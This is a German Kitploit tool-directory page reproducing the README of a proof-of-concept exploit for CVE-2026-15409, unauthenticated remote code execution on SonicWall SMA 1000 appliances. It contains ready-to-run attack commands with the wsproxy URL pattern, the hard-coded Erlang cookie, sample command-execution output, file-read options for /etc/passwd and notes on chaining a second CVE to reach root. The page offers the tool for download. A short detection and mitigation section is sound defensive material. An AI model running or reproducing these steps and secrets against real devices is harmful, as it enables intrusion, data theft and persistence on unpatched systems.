Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-15409 — Proof-of-Concept-Exploit für CVE-2026-15409 (SonicWall SMA 1000 RCE) über Erlang-Distribution per WebSocket. Ermöglicht nicht authentifizierte Remote-Codeausführung als couchdb-Benutzer. | Kitploit
Tools/GitHubGitHub/ch4120n/cve-2026-15409
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationPost-ExploitationPenetrationstestsRed Teaming
GitHubch4120n/cve-2026-15409

CVE-2026-15409

Proof-of-Concept-Exploit für CVE-2026-15409 (SonicWall SMA 1000 RCE) über Erlang-Distribution per WebSocket. Ermöglicht nicht authentifizierte Remote-Codeausführung als couchdb-Benutzer.

Repository anzeigen
12vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚀 CVE-2026-15409 – SonicWall SMA 1000 Erlang-RCE über WebSocket-Proxy

Python Exploit CVE

GitHub stars GitHub issues License

Proof‑of‑Concept-Exploit für CVE-2026-15409 – nicht authentifizierte Remote-Codeausführung auf SonicWall-SMA-1000-Geräten über das per WebSocket getunnelte Erlang-Distributionsprotokoll.


📖 Überblick

CVE-2026-15409 ist eine kritische Schwachstelle, die SonicWall-SMA-1000-Geräte betrifft (Versionen vor dem Hotfix vom Juni 2026). Der Fehler liegt im WorkPlace-Dienst (normalerweise über Port 443 erreichbar), der WebSocket-Verbindungen zu internen Erlang-Knoten weiterleitet. Durch das Fälschen eines gültigen -Parameters und die Verwendung eines fest verdrahteten Erlang-Cookies kann ein Angreifer einen authentifizierten Distributionskanal aufbauen und über RPC-Aufrufe an beliebige Systembefehle als Benutzer (oder andere Konten mit niedrigen Rechten) ausführen.

bmID
os:cmd/1
couchdb

Dieses Repository bietet einen voll funktionsfähigen PoC, der die gesamte Exploit-Kette automatisiert – vom WebSocket-Handshake bis zur Ausführung beliebiger Befehle – mit einer übersichtlichen Schnittstelle, erweiterter Fehlerbehandlung und ansprechender Protokollierung.

🔍 Hauptfunktionen

  • WebSocket-Tunneling – funktioniert direkt über wss:// unter Verwendung des wsproxy-Endpunkts.
  • Erlang-Distributionsprotokoll – implementiert den Handshake und ETF (Erlang External Term Format) vollständig.
  • Remote-Codeausführung – über os:cmd/1; kann Dateien über file:read_file/1 lesen oder die Konnektivität mit erlang:node/0 testen.
  • Intelligente Erkennung – unterstützt beliebige bmID-Werte (solange sie mit -3389 beginnen) und mehrere serviceType-Werte.
  • Umfassende Protokollierung – farbcodierte Meldungen mit Symbolen wie [+], [*], [-], [!] für eine einfache Überwachung.

🧬 Details zur Schwachstelle

Die Schwachstelle resultiert aus den folgenden Designschwächen im SMA 1000:

  1. Uneingeschränktes WebSocket-Proxying – Der /wsproxy-Endpunkt leitet binäre WebSocket-Nachrichten ohne ordnungsgemäße Authentifizierung oder Autorisierung an einen lokalen Erlang-Distributionsport weiter (standardmäßig localhost:1050).
  2. Vorhersehbares/fest verdrahtetes Erlang-Cookie – Das für die Distributionsauthentifizierung verwendete Cookie ist auf allen SMA-Geräten statisch (zumindest in der getesteten Version). Dadurch kann ein externer Angreifer den Handshake abschließen.
  3. Offengelegter Erlang-Knoten – Der Erlang-Knoten [email protected] lauscht auf Port 1050 und akzeptiert Verbindungen vom WebSocket-Proxy, wodurch er aus dem Netzwerk erreichbar ist.
  4. Leistungsstarke RPC-Schnittstelle – Der Erlang-Knoten bietet den Standarddienst rex, der beliebige Funktionen auf dem Knoten ausführen kann, einschließlich os:cmd/1.

Betroffene Versionen

  • SonicWall-SMA-1000-Serie mit Firmware vor dem Hotfix vom Juni 2026 (z. B. ex_sra_vm_12.5.0-02002.ova).
  • Der WorkPlace-Dienst muss aktiviert sein (Standardkonfiguration).

Auswirkungen

  • Remote-Codeausführung als Benutzer couchdb (UID 1010, Gruppe daemon).
  • Laterale Bewegung – ein Angreifer kann CVE-2026-15410 (XML‑RPC-Pfadtraversierung) ausnutzen, um Privilegien auf Root zu erweitern.
  • Datenexfiltration – beliebige Dateien über file:read_file/1 lesen.
  • Persistenz – Hintertüren installieren oder Systemdateien modifizieren.

🔧 Voraussetzungen für die Ausnutzung

  • Netzwerkzugriff auf den WorkPlace-Dienst des SMA-Geräts (normalerweise TCP/443).
  • Keine gültigen Anmeldedaten erforderlich – der Exploit funktioniert ohne Authentifizierung.
  • Python 3.8+ mit der Bibliothek websockets (Installation über pip install websockets).

🚀 Verwendung

Installation

root@kitploit:~
git clone https://github.com/Ch4120N/CVE-2026-15409.git
cd CVE-2026-15409
pip install -r requirements.txt   # websockets

Grundlegender Befehl

root@kitploit:~
python3 cve-2026-15409.py \
  --ws-url 'wss://TARGET_IP/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' \
  --ws-user-agent 'SMA Connect Agent' \
  --ws-insecure-tls \
  --exec 'whoami && id && pwd && hostname'

Beispielausgabe

root@kitploit:~
  ░█▀▀░█░█░█▀▀░░░░░▀▀▄░▄▀▄░▀▀▄░▄▀▀░░░░░▀█░░█▀▀░█░█░▄▀▄░▄▀▄
  ░█░░░▀▄▀░█▀▀░▄▄▄░▄▀░░█/█░▄▀░░█▀▄░▄▄▄░░█░░▀▀▄░░▀█░█/█░░▀█
  ░▀▀▀░░▀░░▀▀▀░░░░░▀▀▀░░▀░░▀▀▀░░▀░░░░░░▀▀▀░▀▀░░░░▀░░▀░░▀▀░
                    [CVE-2026-15409]
         Erlang Distribution RCE via WebSocket Proxy
                     Owner: Ch4120N

[ * ] Connecting via WebSocket to wss://192.168.56.102/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050
[ * ] Preparing RPC: os:cmd('whoami && id && pwd && hostname')
[ + ] Authenticated to [email protected]
[ * ] Calling os:cmd/1 ...
[ + ] RPC call completed
[ * ] Peer name: [email protected]
[ * ] Peer flags: 0xd07df7fbd
[ * ] Peer creation: 1784069352
[ + ] Command output:
couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma

Erweiterte Optionen

ArgumentBeschreibung
--host, --portTCP-Fallback (falls kein WebSocket verwendet wird)
--cookieDas standardmäßige fest verdrahtete Cookie überschreiben
--nameBenutzerdefinierter Name des lokalen Erlang-Knotens
--ws-originOrigin-Header für WebSocket festlegen
--ws-user-agentUser-Agent-Zeichenkette (Standard: SMA Connect Agent)
--ws-insecure-tlsTLS-Überprüfung deaktivieren (selbstsignierte Zertifikate)
--read-fileEine Datei vom Ziel lesen (z. B. /etc/passwd)
--rpcNur die Verbindung testen, indem erlang:node/0 aufgerufen wird

🧪 Technische Details für Erkennung & Feinabstimmung

Fest verdrahtetes Cookie

Das im Exploit verwendete Erlang-Cookie lautet:

root@kitploit:~
10ecad5b446e86864832904cd439b6b70262

Dieser Wert ist auf allen getesteten SMA-Geräten identisch und im Erlang-Prozess auf localhost:1050 fest verdrahtet. Er ist nicht dasselbe wie das benutzerkonfigurierte Cookie für das Clustering.

Der bmID-Parameter

Der bmID-Parameter muss mit -3389 beginnen (z. B. -3389c1b25ccd). Beliebige Werte nach dem Präfix werden akzeptiert, daher sollte eine signaturbasierte Erkennung nicht auf einem festen Hash basieren.

Diensttypen

Während das Beispiel serviceType=SSH verwendet, funktionieren auch andere Werte wie TELNET. Der Exploit ist unabhängig vom Diensttyp.

Portauswahl

Port 1050 ist der standardmäßige interne Port, aber es wurden auch Angriffe in freier Wildbahn beobachtet, die auf Port 8188 abzielen. Der Exploit kann an jeden Port angepasst werden, der das Erlang-Distributionsprotokoll bereitstellt.

Privilegienerweiterung

Nachdem eine Shell als couchdb erlangt wurde, kann ein Angreifer CVE-2026-15410 ausnutzen – eine XML‑RPC-Pfadtraversierung, die das Entfernen des Hotfixes und eine anschließende Privilegienerweiterung auf Root ermöglicht.


🛡️ Erkennung & Eindämmung

Indikatoren für eine Kompromittierung (IoCs)

  • Ungewöhnliche WebSocket-Verbindungen zu /wsproxy mit einer bmID, die mit -3389 beginnt.
  • Unerwartete ausgehende Verbindungen vom SMA-Gerät zu externen IP-Adressen.
  • Prozesse, die vom Benutzer couchdb gestartet wurden (z. B. bash, python, nc).
  • Veränderung oder Erstellung von Dateien in /var/tmp/ durch den Benutzer couchdb.

Empfohlene Maßnahmen

  1. Den offiziellen Patch von SonicWall (Hotfix vom Juni 2026) sofort einspielen.
  2. Den Zugriff auf den WorkPlace-Dienst ausschließlich auf vertrauenswürdige IP-Bereiche beschränken.
  3. Protokolle auf anomale WebSocket-Aktivitäten und Erlang-Distributionsversuche überwachen.
  4. Das Erlang-Cookie für den internen Erlang-Knoten ändern (falls möglich) – auch wenn dies die Anwendungsfunktionalität beeinträchtigen kann.
  5. Den WorkPlace-Dienst deaktivieren, falls nicht benötigt.

👏 Danksagungen

  • Entdeckung & PoC: Ch4120N.
  • Weitere Forschung: SonicWall PSIRT und die breitere Sicherheitsgemeinschaft.

📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

Haftungsausschluss: Dieses Tool ist ausschließlich für Bildungs- und autorisierte Testzwecke bestimmt. Der Autor und die Mitwirkenden übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch diese Software verursacht werden.


📚 Referenzen

  • SonicWall-Sicherheitshinweis (CVE-2026-15409)
  • NIST-NVD-Eintrag – CVE-2026-15409

⭐ Unterstützung

Wenn Sie diesen PoC nützlich finden, geben Sie ihm bitte auf GitHub einen ⭐ und teilen Sie ihn verantwortungsvoll. Beiträge, Issues und Pull-Requests sind willkommen!


Viel Spaß beim Hacking! 🛡️

Tool herunterladen